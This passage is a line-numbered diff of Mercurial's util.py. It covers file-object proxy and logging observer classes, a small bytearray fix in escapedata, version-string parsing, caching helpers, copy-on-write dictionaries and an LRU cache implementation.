571 # Call a method on the observer of the same name with arguments
572 # so it can react, log, etc.
572 # so it can react, log, etc.
573 observer = object.__getattribute__(self, r'_observer')
573 observer = object.__getattribute__(self, r'_observer')
574 fn = getattr(observer, name, None)
574 fn = getattr(observer, name, None)
575 if fn:
575 if fn:
576 fn(res, *args, **kwargs)
576 fn(res, *args, **kwargs)
577
577
578 return res
578 return res
579
579
580 def close(self, *args, **kwargs):
580 def close(self, *args, **kwargs):
581 return object.__getattribute__(self, r'_observedcall')(
581 return object.__getattribute__(self, r'_observedcall')(
582 r'close', *args, **kwargs)
582 r'close', *args, **kwargs)
583
583
584 def fileno(self, *args, **kwargs):
584 def fileno(self, *args, **kwargs):
585 return object.__getattribute__(self, r'_observedcall')(
585 return object.__getattribute__(self, r'_observedcall')(
586 r'fileno', *args, **kwargs)
586 r'fileno', *args, **kwargs)
587
587
588 def flush(self, *args, **kwargs):
588 def flush(self, *args, **kwargs):
589 return object.__getattribute__(self, r'_observedcall')(
589 return object.__getattribute__(self, r'_observedcall')(
590 r'flush', *args, **kwargs)
590 r'flush', *args, **kwargs)
591
591
592 def isatty(self, *args, **kwargs):
592 def isatty(self, *args, **kwargs):
593 return object.__getattribute__(self, r'_observedcall')(
593 return object.__getattribute__(self, r'_observedcall')(
594 r'isatty', *args, **kwargs)
594 r'isatty', *args, **kwargs)
595
595
596 def readable(self, *args, **kwargs):
596 def readable(self, *args, **kwargs):
597 return object.__getattribute__(self, r'_observedcall')(
597 return object.__getattribute__(self, r'_observedcall')(
598 r'readable', *args, **kwargs)
598 r'readable', *args, **kwargs)
599
599
600 def readline(self, *args, **kwargs):
600 def readline(self, *args, **kwargs):
601 return object.__getattribute__(self, r'_observedcall')(
601 return object.__getattribute__(self, r'_observedcall')(
602 r'readline', *args, **kwargs)
602 r'readline', *args, **kwargs)
603
603
604 def readlines(self, *args, **kwargs):
604 def readlines(self, *args, **kwargs):
605 return object.__getattribute__(self, r'_observedcall')(
605 return object.__getattribute__(self, r'_observedcall')(
606 r'readlines', *args, **kwargs)
606 r'readlines', *args, **kwargs)
607
607
608 def seek(self, *args, **kwargs):
608 def seek(self, *args, **kwargs):
609 return object.__getattribute__(self, r'_observedcall')(
609 return object.__getattribute__(self, r'_observedcall')(
610 r'seek', *args, **kwargs)
610 r'seek', *args, **kwargs)
611
611
612 def seekable(self, *args, **kwargs):
612 def seekable(self, *args, **kwargs):
613 return object.__getattribute__(self, r'_observedcall')(
613 return object.__getattribute__(self, r'_observedcall')(
614 r'seekable', *args, **kwargs)
614 r'seekable', *args, **kwargs)
615
615
616 def tell(self, *args, **kwargs):
616 def tell(self, *args, **kwargs):
617 return object.__getattribute__(self, r'_observedcall')(
617 return object.__getattribute__(self, r'_observedcall')(
618 r'tell', *args, **kwargs)
618 r'tell', *args, **kwargs)
619
619
620 def truncate(self, *args, **kwargs):
620 def truncate(self, *args, **kwargs):
621 return object.__getattribute__(self, r'_observedcall')(
621 return object.__getattribute__(self, r'_observedcall')(
622 r'truncate', *args, **kwargs)
622 r'truncate', *args, **kwargs)
623
623
624 def writable(self, *args, **kwargs):
624 def writable(self, *args, **kwargs):
625 return object.__getattribute__(self, r'_observedcall')(
625 return object.__getattribute__(self, r'_observedcall')(
626 r'writable', *args, **kwargs)
626 r'writable', *args, **kwargs)
627
627
628 def writelines(self, *args, **kwargs):
628 def writelines(self, *args, **kwargs):
629 return object.__getattribute__(self, r'_observedcall')(
629 return object.__getattribute__(self, r'_observedcall')(
630 r'writelines', *args, **kwargs)
630 r'writelines', *args, **kwargs)
631
631
632 def read(self, *args, **kwargs):
632 def read(self, *args, **kwargs):
633 return object.__getattribute__(self, r'_observedcall')(
633 return object.__getattribute__(self, r'_observedcall')(
634 r'read', *args, **kwargs)
634 r'read', *args, **kwargs)
635
635
636 def readall(self, *args, **kwargs):
636 def readall(self, *args, **kwargs):
637 return object.__getattribute__(self, r'_observedcall')(
637 return object.__getattribute__(self, r'_observedcall')(
638 r'readall', *args, **kwargs)
638 r'readall', *args, **kwargs)
639
639
640 def readinto(self, *args, **kwargs):
640 def readinto(self, *args, **kwargs):
641 return object.__getattribute__(self, r'_observedcall')(
641 return object.__getattribute__(self, r'_observedcall')(
642 r'readinto', *args, **kwargs)
642 r'readinto', *args, **kwargs)
643
643
644 def write(self, *args, **kwargs):
644 def write(self, *args, **kwargs):
645 return object.__getattribute__(self, r'_observedcall')(
645 return object.__getattribute__(self, r'_observedcall')(
646 r'write', *args, **kwargs)
646 r'write', *args, **kwargs)
647
647
648 def detach(self, *args, **kwargs):
648 def detach(self, *args, **kwargs):
649 return object.__getattribute__(self, r'_observedcall')(
649 return object.__getattribute__(self, r'_observedcall')(
650 r'detach', *args, **kwargs)
650 r'detach', *args, **kwargs)
651
651
652 def read1(self, *args, **kwargs):
652 def read1(self, *args, **kwargs):
653 return object.__getattribute__(self, r'_observedcall')(
653 return object.__getattribute__(self, r'_observedcall')(
654 r'read1', *args, **kwargs)
654 r'read1', *args, **kwargs)
655
655
656 class observedbufferedinputpipe(bufferedinputpipe):
656 class observedbufferedinputpipe(bufferedinputpipe):
657 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
657 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
658
658
659 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
659 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
660 bypass ``fileobjectproxy``. Because of this, we need to make
660 bypass ``fileobjectproxy``. Because of this, we need to make
661 ``bufferedinputpipe`` aware of these operations.
661 ``bufferedinputpipe`` aware of these operations.
662
662
663 This variation of ``bufferedinputpipe`` can notify observers about
663 This variation of ``bufferedinputpipe`` can notify observers about
664 ``os.read()`` events. It also re-publishes other events, such as
664 ``os.read()`` events. It also re-publishes other events, such as
665 ``read()`` and ``readline()``.
665 ``read()`` and ``readline()``.
666 """
666 """
667 def _fillbuffer(self):
667 def _fillbuffer(self):
668 res = super(observedbufferedinputpipe, self)._fillbuffer()
668 res = super(observedbufferedinputpipe, self)._fillbuffer()
669
669
670 fn = getattr(self._input._observer, r'osread', None)
670 fn = getattr(self._input._observer, r'osread', None)
671 if fn:
671 if fn:
672 fn(res, _chunksize)
672 fn(res, _chunksize)
673
673
674 return res
674 return res
675
675
676 # We use different observer methods because the operation isn't
676 # We use different observer methods because the operation isn't
677 # performed on the actual file object but on us.
677 # performed on the actual file object but on us.
678 def read(self, size):
678 def read(self, size):
679 res = super(observedbufferedinputpipe, self).read(size)
679 res = super(observedbufferedinputpipe, self).read(size)
680
680
681 fn = getattr(self._input._observer, r'bufferedread', None)
681 fn = getattr(self._input._observer, r'bufferedread', None)
682 if fn:
682 if fn:
683 fn(res, size)
683 fn(res, size)
684
684
685 return res
685 return res
686
686
687 def readline(self, *args, **kwargs):
687 def readline(self, *args, **kwargs):
688 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
688 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
689
689
690 fn = getattr(self._input._observer, r'bufferedreadline', None)
690 fn = getattr(self._input._observer, r'bufferedreadline', None)
691 if fn:
691 if fn:
692 fn(res)
692 fn(res)
693
693
694 return res
694 return res
695
695
696 DATA_ESCAPE_MAP = {pycompat.bytechr(i): br'\x%02x' % i for i in range(256)}
696 DATA_ESCAPE_MAP = {pycompat.bytechr(i): br'\x%02x' % i for i in range(256)}
697 DATA_ESCAPE_MAP.update({
697 DATA_ESCAPE_MAP.update({
698 b'\\': b'\\\\',
698 b'\\': b'\\\\',
699 b'\r': br'\r',
699 b'\r': br'\r',
700 b'\n': br'\n',
700 b'\n': br'\n',
701 })
701 })
702 DATA_ESCAPE_RE = remod.compile(br'[\x00-\x08\x0a-\x1f\\\x7f-\xff]')
702 DATA_ESCAPE_RE = remod.compile(br'[\x00-\x08\x0a-\x1f\\\x7f-\xff]')
703
703
704 def escapedata(s):
704 def escapedata(s):
705 if isinstance(s, bytearray):
706 s = bytes(s)
707
705 return DATA_ESCAPE_RE.sub(lambda m: DATA_ESCAPE_MAP[m.group(0)], s)
708 return DATA_ESCAPE_RE.sub(lambda m: DATA_ESCAPE_MAP[m.group(0)], s)
706
709
707 class fileobjectobserver(object):
710 class fileobjectobserver(object):
708 """Logs file object activity."""
711 """Logs file object activity."""
709 def __init__(self, fh, name, reads=True, writes=True, logdata=False):
712 def __init__(self, fh, name, reads=True, writes=True, logdata=False):
710 self.fh = fh
713 self.fh = fh
711 self.name = name
714 self.name = name
712 self.logdata = logdata
715 self.logdata = logdata
713 self.reads = reads
716 self.reads = reads
714 self.writes = writes
717 self.writes = writes
715
718
716 def _writedata(self, data):
719 def _writedata(self, data):
717 if not self.logdata:
720 if not self.logdata:
718 self.fh.write('\n')
721 self.fh.write('\n')
719 return
722 return
720
723
721 # Simple case writes all data on a single line.
724 # Simple case writes all data on a single line.
722 if b'\n' not in data:
725 if b'\n' not in data:
723 self.fh.write(': %s\n' % escapedata(data))
726 self.fh.write(': %s\n' % escapedata(data))
724 return
727 return
725
728
726 # Data with newlines is written to multiple lines.
729 # Data with newlines is written to multiple lines.
727 self.fh.write(':\n')
730 self.fh.write(':\n')
728 lines = data.splitlines(True)
731 lines = data.splitlines(True)
729 for line in lines:
732 for line in lines:
730 self.fh.write('%s> %s\n' % (self.name, escapedata(line)))
733 self.fh.write('%s> %s\n' % (self.name, escapedata(line)))
731
734
732 def read(self, res, size=-1):
735 def read(self, res, size=-1):
733 if not self.reads:
736 if not self.reads:
734 return
737 return
735 # Python 3 can return None from reads at EOF instead of empty strings.
738 # Python 3 can return None from reads at EOF instead of empty strings.
736 if res is None:
739 if res is None:
737 res = ''
740 res = ''
738
741
739 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
742 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
740 self._writedata(res)
743 self._writedata(res)
741
744
742 def readline(self, res, limit=-1):
745 def readline(self, res, limit=-1):
743 if not self.reads:
746 if not self.reads:
744 return
747 return
745
748
746 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
749 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
747 self._writedata(res)
750 self._writedata(res)
748
751
749 def write(self, res, data):
752 def write(self, res, data):
750 if not self.writes:
753 if not self.writes:
751 return
754 return
752
755
753 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
756 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
754 self._writedata(data)
757 self._writedata(data)
755
758
756 def flush(self, res):
759 def flush(self, res):
757 if not self.writes:
760 if not self.writes:
758 return
761 return
759
762
760 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
763 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
761
764
762 # For observedbufferedinputpipe.
765 # For observedbufferedinputpipe.
763 def bufferedread(self, res, size):
766 def bufferedread(self, res, size):
764 self.fh.write('%s> bufferedread(%d) -> %d' % (
767 self.fh.write('%s> bufferedread(%d) -> %d' % (
765 self.name, size, len(res)))
768 self.name, size, len(res)))
766 self._writedata(res)
769 self._writedata(res)
767
770
768 def bufferedreadline(self, res):
771 def bufferedreadline(self, res):
769 self.fh.write('%s> bufferedreadline() -> %d' % (self.name, len(res)))
772 self.fh.write('%s> bufferedreadline() -> %d' % (self.name, len(res)))
770 self._writedata(res)
773 self._writedata(res)
771
774
772 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
775 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
773 logdata=False):
776 logdata=False):
774 """Turn a file object into a logging file object."""
777 """Turn a file object into a logging file object."""
775
778
776 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
779 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
777 logdata=logdata)
780 logdata=logdata)
778 return fileobjectproxy(fh, observer)
781 return fileobjectproxy(fh, observer)
779
782
780 def version():
783 def version():
781 """Return version information if available."""
784 """Return version information if available."""
782 try:
785 try:
783 from . import __version__
786 from . import __version__
784 return __version__.version
787 return __version__.version
785 except ImportError:
788 except ImportError:
786 return 'unknown'
789 return 'unknown'
787
790
788 def versiontuple(v=None, n=4):
791 def versiontuple(v=None, n=4):
789 """Parses a Mercurial version string into an N-tuple.
792 """Parses a Mercurial version string into an N-tuple.
790
793
791 The version string to be parsed is specified with the ``v`` argument.
794 The version string to be parsed is specified with the ``v`` argument.
792 If it isn't defined, the current Mercurial version string will be parsed.
795 If it isn't defined, the current Mercurial version string will be parsed.
793
796
794 ``n`` can be 2, 3, or 4. Here is how some version strings map to
797 ``n`` can be 2, 3, or 4. Here is how some version strings map to
795 returned values:
798 returned values:
796
799
797 >>> v = b'3.6.1+190-df9b73d2d444'
800 >>> v = b'3.6.1+190-df9b73d2d444'
798 >>> versiontuple(v, 2)
801 >>> versiontuple(v, 2)
799 (3, 6)
802 (3, 6)
800 >>> versiontuple(v, 3)
803 >>> versiontuple(v, 3)
801 (3, 6, 1)
804 (3, 6, 1)
802 >>> versiontuple(v, 4)
805 >>> versiontuple(v, 4)
803 (3, 6, 1, '190-df9b73d2d444')
806 (3, 6, 1, '190-df9b73d2d444')
804
807
805 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
808 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
806 (3, 6, 1, '190-df9b73d2d444+20151118')
809 (3, 6, 1, '190-df9b73d2d444+20151118')
807
810
808 >>> v = b'3.6'
811 >>> v = b'3.6'
809 >>> versiontuple(v, 2)
812 >>> versiontuple(v, 2)
810 (3, 6)
813 (3, 6)
811 >>> versiontuple(v, 3)
814 >>> versiontuple(v, 3)
812 (3, 6, None)
815 (3, 6, None)
813 >>> versiontuple(v, 4)
816 >>> versiontuple(v, 4)
814 (3, 6, None, None)
817 (3, 6, None, None)
815
818
816 >>> v = b'3.9-rc'
819 >>> v = b'3.9-rc'
817 >>> versiontuple(v, 2)
820 >>> versiontuple(v, 2)
818 (3, 9)
821 (3, 9)
819 >>> versiontuple(v, 3)
822 >>> versiontuple(v, 3)
820 (3, 9, None)
823 (3, 9, None)
821 >>> versiontuple(v, 4)
824 >>> versiontuple(v, 4)
822 (3, 9, None, 'rc')
825 (3, 9, None, 'rc')
823
826
824 >>> v = b'3.9-rc+2-02a8fea4289b'
827 >>> v = b'3.9-rc+2-02a8fea4289b'
825 >>> versiontuple(v, 2)
828 >>> versiontuple(v, 2)
826 (3, 9)
829 (3, 9)
827 >>> versiontuple(v, 3)
830 >>> versiontuple(v, 3)
828 (3, 9, None)
831 (3, 9, None)
829 >>> versiontuple(v, 4)
832 >>> versiontuple(v, 4)
830 (3, 9, None, 'rc+2-02a8fea4289b')
833 (3, 9, None, 'rc+2-02a8fea4289b')
831 """
834 """
832 if not v:
835 if not v:
833 v = version()
836 v = version()
834 parts = remod.split('[\+-]', v, 1)
837 parts = remod.split('[\+-]', v, 1)
835 if len(parts) == 1:
838 if len(parts) == 1:
836 vparts, extra = parts[0], None
839 vparts, extra = parts[0], None
837 else:
840 else:
838 vparts, extra = parts
841 vparts, extra = parts
839
842
840 vints = []
843 vints = []
841 for i in vparts.split('.'):
844 for i in vparts.split('.'):
842 try:
845 try:
843 vints.append(int(i))
846 vints.append(int(i))
844 except ValueError:
847 except ValueError:
845 break
848 break
846 # (3, 6) -> (3, 6, None)
849 # (3, 6) -> (3, 6, None)
847 while len(vints) < 3:
850 while len(vints) < 3:
848 vints.append(None)
851 vints.append(None)
849
852
850 if n == 2:
853 if n == 2:
851 return (vints[0], vints[1])
854 return (vints[0], vints[1])
852 if n == 3:
855 if n == 3:
853 return (vints[0], vints[1], vints[2])
856 return (vints[0], vints[1], vints[2])
854 if n == 4:
857 if n == 4:
855 return (vints[0], vints[1], vints[2], extra)
858 return (vints[0], vints[1], vints[2], extra)
856
859
857 def cachefunc(func):
860 def cachefunc(func):
858 '''cache the result of function calls'''
861 '''cache the result of function calls'''
859 # XXX doesn't handle keywords args
862 # XXX doesn't handle keywords args
860 if func.__code__.co_argcount == 0:
863 if func.__code__.co_argcount == 0:
861 cache = []
864 cache = []
862 def f():
865 def f():
863 if len(cache) == 0:
866 if len(cache) == 0:
864 cache.append(func())
867 cache.append(func())
865 return cache[0]
868 return cache[0]
866 return f
869 return f
867 cache = {}
870 cache = {}
868 if func.__code__.co_argcount == 1:
871 if func.__code__.co_argcount == 1:
869 # we gain a small amount of time because
872 # we gain a small amount of time because
870 # we don't need to pack/unpack the list
873 # we don't need to pack/unpack the list
871 def f(arg):
874 def f(arg):
872 if arg not in cache:
875 if arg not in cache:
873 cache[arg] = func(arg)
876 cache[arg] = func(arg)
874 return cache[arg]
877 return cache[arg]
875 else:
878 else:
876 def f(*args):
879 def f(*args):
877 if args not in cache:
880 if args not in cache:
878 cache[args] = func(*args)
881 cache[args] = func(*args)
879 return cache[args]
882 return cache[args]
880
883
881 return f
884 return f
882
885
883 class cow(object):
886 class cow(object):
884 """helper class to make copy-on-write easier
887 """helper class to make copy-on-write easier
885
888
886 Call preparewrite before doing any writes.
889 Call preparewrite before doing any writes.
887 """
890 """
888
891
889 def preparewrite(self):
892 def preparewrite(self):
890 """call this before writes, return self or a copied new object"""
893 """call this before writes, return self or a copied new object"""
891 if getattr(self, '_copied', 0):
894 if getattr(self, '_copied', 0):
892 self._copied -= 1
895 self._copied -= 1
893 return self.__class__(self)
896 return self.__class__(self)
894 return self
897 return self
895
898
896 def copy(self):
899 def copy(self):
897 """always do a cheap copy"""
900 """always do a cheap copy"""
898 self._copied = getattr(self, '_copied', 0) + 1
901 self._copied = getattr(self, '_copied', 0) + 1
899 return self
902 return self
900
903
901 class sortdict(collections.OrderedDict):
904 class sortdict(collections.OrderedDict):
902 '''a simple sorted dictionary
905 '''a simple sorted dictionary
903
906
904 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
907 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
905 >>> d2 = d1.copy()
908 >>> d2 = d1.copy()
906 >>> d2
909 >>> d2
907 sortdict([('a', 0), ('b', 1)])
910 sortdict([('a', 0), ('b', 1)])
908 >>> d2.update([(b'a', 2)])
911 >>> d2.update([(b'a', 2)])
909 >>> list(d2.keys()) # should still be in last-set order
912 >>> list(d2.keys()) # should still be in last-set order
910 ['b', 'a']
913 ['b', 'a']
911 '''
914 '''
912
915
913 def __setitem__(self, key, value):
916 def __setitem__(self, key, value):
914 if key in self:
917 if key in self:
915 del self[key]
918 del self[key]
916 super(sortdict, self).__setitem__(key, value)
919 super(sortdict, self).__setitem__(key, value)
917
920
918 if pycompat.ispypy:
921 if pycompat.ispypy:
919 # __setitem__() isn't called as of PyPy 5.8.0
922 # __setitem__() isn't called as of PyPy 5.8.0
920 def update(self, src):
923 def update(self, src):
921 if isinstance(src, dict):
924 if isinstance(src, dict):
922 src = src.iteritems()
925 src = src.iteritems()
923 for k, v in src:
926 for k, v in src:
924 self[k] = v
927 self[k] = v
925
928
926 class cowdict(cow, dict):
929 class cowdict(cow, dict):
927 """copy-on-write dict
930 """copy-on-write dict
928
931
929 Be sure to call d = d.preparewrite() before writing to d.
932 Be sure to call d = d.preparewrite() before writing to d.
930
933
931 >>> a = cowdict()
934 >>> a = cowdict()
932 >>> a is a.preparewrite()
935 >>> a is a.preparewrite()
933 True
936 True
934 >>> b = a.copy()
937 >>> b = a.copy()
935 >>> b is a
938 >>> b is a
936 True
939 True
937 >>> c = b.copy()
940 >>> c = b.copy()
938 >>> c is a
941 >>> c is a
939 True
942 True
940 >>> a = a.preparewrite()
943 >>> a = a.preparewrite()
941 >>> b is a
944 >>> b is a
942 False
945 False
943 >>> a is a.preparewrite()
946 >>> a is a.preparewrite()
944 True
947 True
945 >>> c = c.preparewrite()
948 >>> c = c.preparewrite()
946 >>> b is c
949 >>> b is c
947 False
950 False
948 >>> b is b.preparewrite()
951 >>> b is b.preparewrite()
949 True
952 True
950 """
953 """
951
954
952 class cowsortdict(cow, sortdict):
955 class cowsortdict(cow, sortdict):
953 """copy-on-write sortdict
956 """copy-on-write sortdict
954
957
955 Be sure to call d = d.preparewrite() before writing to d.
958 Be sure to call d = d.preparewrite() before writing to d.
956 """
959 """
957
960
958 class transactional(object):
961 class transactional(object):
959 """Base class for making a transactional type into a context manager."""
962 """Base class for making a transactional type into a context manager."""
960 __metaclass__ = abc.ABCMeta
963 __metaclass__ = abc.ABCMeta
961
964
962 @abc.abstractmethod
965 @abc.abstractmethod
963 def close(self):
966 def close(self):
964 """Successfully closes the transaction."""
967 """Successfully closes the transaction."""
965
968
966 @abc.abstractmethod
969 @abc.abstractmethod
967 def release(self):
970 def release(self):
968 """Marks the end of the transaction.
971 """Marks the end of the transaction.
969
972
970 If the transaction has not been closed, it will be aborted.
973 If the transaction has not been closed, it will be aborted.
971 """
974 """
972
975
973 def __enter__(self):
976 def __enter__(self):
974 return self
977 return self
975
978
976 def __exit__(self, exc_type, exc_val, exc_tb):
979 def __exit__(self, exc_type, exc_val, exc_tb):
977 try:
980 try:
978 if exc_type is None:
981 if exc_type is None:
979 self.close()
982 self.close()
980 finally:
983 finally:
981 self.release()
984 self.release()
982
985
983 @contextlib.contextmanager
986 @contextlib.contextmanager
984 def acceptintervention(tr=None):
987 def acceptintervention(tr=None):
985 """A context manager that closes the transaction on InterventionRequired
988 """A context manager that closes the transaction on InterventionRequired
986
989
987 If no transaction was provided, this simply runs the body and returns
990 If no transaction was provided, this simply runs the body and returns
988 """
991 """
989 if not tr:
992 if not tr:
990 yield
993 yield
991 return
994 return
992 try:
995 try:
993 yield
996 yield
994 tr.close()
997 tr.close()
995 except error.InterventionRequired:
998 except error.InterventionRequired:
996 tr.close()
999 tr.close()
997 raise
1000 raise
998 finally:
1001 finally:
999 tr.release()
1002 tr.release()
1000
1003
1001 @contextlib.contextmanager
1004 @contextlib.contextmanager
1002 def nullcontextmanager():
1005 def nullcontextmanager():
1003 yield
1006 yield
1004
1007
1005 class _lrucachenode(object):
1008 class _lrucachenode(object):
1006 """A node in a doubly linked list.
1009 """A node in a doubly linked list.
1007
1010
1008 Holds a reference to nodes on either side as well as a key-value
1011 Holds a reference to nodes on either side as well as a key-value
1009 pair for the dictionary entry.
1012 pair for the dictionary entry.
1010 """
1013 """
1011 __slots__ = (u'next', u'prev', u'key', u'value')
1014 __slots__ = (u'next', u'prev', u'key', u'value')
1012
1015
1013 def __init__(self):
1016 def __init__(self):
1014 self.next = None
1017 self.next = None
1015 self.prev = None
1018 self.prev = None
1016
1019
1017 self.key = _notset
1020 self.key = _notset
1018 self.value = None
1021 self.value = None
1019
1022
1020 def markempty(self):
1023 def markempty(self):
1021 """Mark the node as emptied."""
1024 """Mark the node as emptied."""
1022 self.key = _notset
1025 self.key = _notset
1023
1026
1024 class lrucachedict(object):
1027 class lrucachedict(object):
1025 """Dict that caches most recent accesses and sets.
1028 """Dict that caches most recent accesses and sets.
1026
1029
1027 The dict consists of an actual backing dict - indexed by original
1030 The dict consists of an actual backing dict - indexed by original
1028 key - and a doubly linked circular list defining the order of entries in
1031 key - and a doubly linked circular list defining the order of entries in
1029 the cache.
1032 the cache.
1030
1033
1031 The head node is the newest entry in the cache. If the cache is full,
1034 The head node is the newest entry in the cache. If the cache is full,
1032 we recycle head.prev and make it the new head. Cache accesses result in
1035 we recycle head.prev and make it the new head. Cache accesses result in
1033 the node being moved to before the existing head and being marked as the
1036 the node being moved to before the existing head and being marked as the
1034 new head node.
1037 new head node.
1035 """
1038 """
1036 def __init__(self, max):
1039 def __init__(self, max):
1037 self._cache = {}
1040 self._cache = {}
1038
1041
1039 self._head = head = _lrucachenode()
1042 self._head = head = _lrucachenode()
1040 head.prev = head
1043 head.prev = head
1041 head.next = head
1044 head.next = head
1042 self._size = 1
1045 self._size = 1
1043 self._capacity = max
1046 self._capacity = max
1044
1047
1045 def __len__(self):
1048 def __len__(self):
1046 return len(self._cache)
1049 return len(self._cache)
1047
1050
1048 def __contains__(self, k):
1051 def __contains__(self, k):
1049 return k in self._cache
1052 return k in self._cache
1050
1053
1051 def __iter__(self):
1054 def __iter__(self):
1052 # We don't have to iterate in cache order, but why not.
1055 # We don't have to iterate in cache order, but why not.
1053 n = self._head
1056 n = self._head
1054 for i in range(len(self._cache)):
1057 for i in range(len(self._cache)):
1055 yield n.key
1058 yield n.key
1056 n = n.next
1059 n = n.next
1057
1060
1058 def __getitem__(self, k):
1061 def __getitem__(self, k):
1059 node = self._cache[k]
1062 node = self._cache[k]
1060 self._movetohead(node)
1063 self._movetohead(node)
1061 return node.value
1064 return node.value
1062
1065
1063 def __setitem__(self, k, v):
1066 def __setitem__(self, k, v):
1064 node = self._cache.get(k)
1067 node = self._cache.get(k)
1065 # Replace existing value and mark as newest.
1068 # Replace existing value and mark as newest.
1066 if node is not None:
1069 if node is not None:
1067 node.value = v
1070 node.value = v
1068 self._movetohead(node)
1071 self._movetohead(node)
1069 return
1072 return
1070
1073
1071 if self._size < self._capacity:
1074 if self._size < self._capacity:
1072 node = self._addcapacity()
1075 node = self._addcapacity()
1073 else:
1076 else:
1074 # Grab the last/oldest item.
1077 # Grab the last/oldest item.
1075 node = self._head.prev
1078 node = self._head.prev
1076
1079
1077 # At capacity. Kill the old entry.
1080 # At capacity. Kill the old entry.
1078 if node.key is not _notset:
1081 if node.key is not _notset:
1079 del self._cache[node.key]
1082 del self._cache[node.key]
1080
1083
1081 node.key = k
1084 node.key = k
1082 node.value = v
1085 node.value = v
1083 self._cache[k] = node
1086 self._cache[k] = node
1084 # And mark it as newest entry. No need to adjust order since it
1087 # And mark it as newest entry. No need to adjust order since it
1085 # is already self._head.prev.
1088 # is already self._head.prev.
1086 self._head = node
1089 self._head = node
1087
1090
1088 def __delitem__(self, k):
1091 def __delitem__(self, k):
1089 node = self._cache.pop(k)
1092 node = self._cache.pop(k)
1090 node.markempty()
1093 node.markempty()
1091
1094
1092 # Temporarily mark as newest item before re-adjusting head to make
1095 # Temporarily mark as newest item before re-adjusting head to make
1093 # this node the oldest item.
1096 # this node the oldest item.
1094 self._movetohead(node)
1097 self._movetohead(node)
1095 self._head = node.next
1098 self._head = node.next
1096
1099
1097 # Additional dict methods.
1100 # Additional dict methods.
1098
1101
1099 def get(self, k, default=None):
1102 def get(self, k, default=None):
1100 try:
1103 try:
1101 return self._cache[k].value
1104 return self._cache[k].value
1102 except KeyError:
1105 except KeyError:
1103 return default
1106 return default
1104
1107
1105 def clear(self):
1108 def clear(self):
1106 n = self._head
1109 n = self._head
1107 while n.key is not _notset:
1110 while n.key is not _notset:
1108 n.markempty()
1111 n.markempty()
1109 n = n.next
1112 n = n.next
1110
1113
1111 self._cache.clear()
1114 self._cache.clear()
1112
1115
1113 def copy(self):
1116 def copy(self):
1114 result = lrucachedict(self._capacity)
1117 result = lrucachedict(self._capacity)
1115 n = self._head.prev
1118 n = self._head.prev
1116 # Iterate in oldest-to-newest order, so the copy has the right ordering
1119 # Iterate in oldest-to-newest order, so the copy has the right ordering
1117 for i in range(len(self._cache)):
1120 for i in range(len(self._cache)):
1118 result[n.key] = n.value
1121 result[n.key] = n.value
1119 n = n.prev
1122 n = n.prev
1120 return result
1123 return result
1121
1124
1122 def _movetohead(self, node):
1125 def _movetohead(self, node):
1123 """Mark a node as the newest, making it the new head.
1126 """Mark a node as the newest, making it the new head.
1124
1127
1125 When a node is accessed, it becomes the freshest entry in the LRU
1128 When a node is accessed, it becomes the freshest entry in the LRU
1126 list, which is denoted by self._head.
1129 list, which is denoted by self._head.
1127
1130
1128 Visually, let's make ``N`` the new head node (* denotes head):
1131 Visually, let's make ``N`` the new head node (* denotes head):
1129
1132
1130 previous/oldest <-> head <-> next/next newest
1133 previous/oldest <-> head <-> next/next newest
1131
1134
1132 ----<->--- A* ---<->-----
1135 ----<->--- A* ---<->-----
1133 | |
1136 | |
1134 E <-> D <-> N <-> C <-> B
1137 E <-> D <-> N <-> C <-> B
1135
1138
1136 To:
1139 To:
1137
1140
1138 ----<->--- N* ---<->-----
1141 ----<->--- N* ---<->-----
1139 | |
1142 | |
1140 E <-> D <-> C <-> B <-> A
1143 E <-> D <-> C <-> B <-> A
1141
1144
1142 This requires the following moves:
1145 This requires the following moves:
1143
1146
1144 C.next = D (node.prev.next = node.next)
1147 C.next = D (node.prev.next = node.next)
1145 D.prev = C (node.next.prev = node.prev)
1148 D.prev = C (node.next.prev = node.prev)
1146 E.next = N (head.prev.next = node)
1149 E.next = N (head.prev.next = node)
1147 N.prev = E (node.prev = head.prev)
1150 N.prev = E (node.prev = head.prev)
1148 N.next = A (node.next = head)
1151 N.next = A (node.next = head)
1149 A.prev = N (head.prev = node)
1152 A.prev = N (head.prev = node)
1150 """
1153 """
1151 head = self._head
1154 head = self._head
1152 # C.next = D
1155 # C.next = D
1153 node.prev.next = node.next
1156 node.prev.next = node.next
1154 # D.prev = C
1157 # D.prev = C
1155 node.next.prev = node.prev
1158 node.next.prev = node.prev
1156 # N.prev = E
1159 # N.prev = E
1157 node.prev = head.prev
1160 node.prev = head.prev
1158 # N.next = A
1161 # N.next = A
1159 # It is tempting to do just "head" here, however if node is
1162 # It is tempting to do just "head" here, however if node is
1160 # adjacent to head, this will do bad things.
1163 # adjacent to head, this will do bad things.
1161 node.next = head.prev.next
1164 node.next = head.prev.next
1162 # E.next = N
1165 # E.next = N
1163 node.next.prev = node
1166 node.next.prev = node
1164 # A.prev = N
1167 # A.prev = N
1165 node.prev.next = node
1168 node.prev.next = node
1166
1169
1167 self._head = node
1170 self._head = node
1168
1171
1169 def _addcapacity(self):
1172 def _addcapacity(self):
1170 """Add a node to the circular linked list.
1173 """Add a node to the circular linked list.
1171
1174
1172 The new node is inserted before the head node.
1175 The new node is inserted before the head node.
1173 """
1176 """
1174 head = self._head
1177 head = self._head
1175 node = _lrucachenode()
1178 node = _lrucachenode()
1176 head.prev.next = node
